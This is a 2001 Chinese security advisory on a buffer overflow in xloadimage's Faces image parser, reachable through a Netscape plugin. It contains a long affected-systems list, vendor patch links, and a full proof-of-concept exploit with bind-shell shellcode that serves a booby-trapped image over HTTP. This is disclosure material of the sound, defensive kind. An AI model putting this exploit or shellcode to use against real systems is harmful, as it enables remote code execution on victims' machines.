|
|
xloadimage 缓冲溢出漏洞
发布时间:2001-07-13
更新时间:2001-07-13
严重程度:高
威胁程度:普通用户访问权限
错误类型:输入验证错误
利用方式:客户机模式
受影响系统xloadimage xloadimage 4.1
- RedHat Powertools 6.2
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- Netscape Communicator 4.77
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.76
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux 2.3
- Caldera OpenLinux eBuilder 3.0
- Netscape Communicator 4.75
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.74
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.73
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0es
- Conectiva Linux 4.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.72
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0es
- Conectiva Linux 4.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.7
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3 详细描述
xloadimage是在X11服务器上显示各种格式图象的工具,其中
在处理'Faces Project'图象类型上存在缓冲溢出漏洞。可能导致远程攻击者建立文件并利用这个漏洞执行任意代码,REDHAT的一选项的netscape plugin可以调用xloadimage来装载部分图象类型,如果这个plugin使用的话,就可能把利用文件放
在WEB 上,并在目标用户浏览的时候执行任意代码。
测试代码
************************************************************************/
//#define TARGET 0x080e1337
//as 1337 as the 1337357 kiddies.
#define TARGET 0xdeadbeef
// lamagra's port binding shell code (from bind.c in the sc.tar.gz)
//
char lamagra_bind_code[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x1d\x29\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
// slight modification so it listens on 7465 instead of 3879
// TAGS is easier to remember ;]
char *
this (int doit)
{
char *p;
int v;
p = (char *) malloc (8200);
memset (p, 0x90, 8200);
if (!doit)
for (v = 0; v < 8100; v += 122)
{
p[v] = 0xeb;
p[v + 1] = 120;
}
if (doit)
memcpy (&p[7000], lamagra_bind_code, strlen (lamagra_bind_code));
p[8199] = 0;
return p;
}
main (int argc)
{
int z0, x = TARGET;
int z1, y = x;
int p;
char *q;
if (argc > 1)
printf ("HTTP/1.0 200\nContent-Type: image/x-tiff\n\n");
printf ("FirstName: %s\n", this (0));
printf ("LastName: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");
printf ("%s\n", &x);
// Begin Padding Heap With 'Garbage' (nop/jmp)
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
printf ("%s", this (0));
// End Padding Heap With 'Garbage' (nop/jmp)
printf ("%s", this (1));
printf ("http://www.mp3.com/cosv");
printf ("\nPicData: 32 32 8\n");
printf ("\n");
for (p = 0; p < 9994; p += 1)
printf ("A");
} // EOF -- tstot.c --
解决方案
在/etc/pluggerrc文件中关闭xloadimage,或者下载新的程序:
xloadimage xloadimage 4.1:
Red Hat RPM 6.2 alpha xloadimage-4.1-19.6.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/xloadimage-4.1-19.6.alpha.rpm
Red Hat RPM 6.2 i386 xloadimage-4.1-19.6.i386.rpm
ftp://updates.redhat.com/6.2/en/os/i386/xloadimage-4.1-19.6.i386.rpm
Red Hat RPM 6.2 sparc xloadimage-4.1-19.6.sparc.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/xloadimage-4.1-19.6.sparc.rpm
Red Hat RPM 6.2 i386 xloadimage-4.1-20.i386.rpm
ftp://updates.redhat.com/7.0/en/os/i386/xloadimage-4.1-20.i386.rpm
Red Hat RPM 7.1 alpha xloadimage-4.1-20.alpha.rpm
ftp://updates.redhat.com/7.1/en/os/alpha/xloadimage-4.1-20.alpha.rpm
Red Hat RPM 7.1 i386 xloadimage-4.1-20.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/xloadimage-4.1-20.i386.rpm
相关信息
|
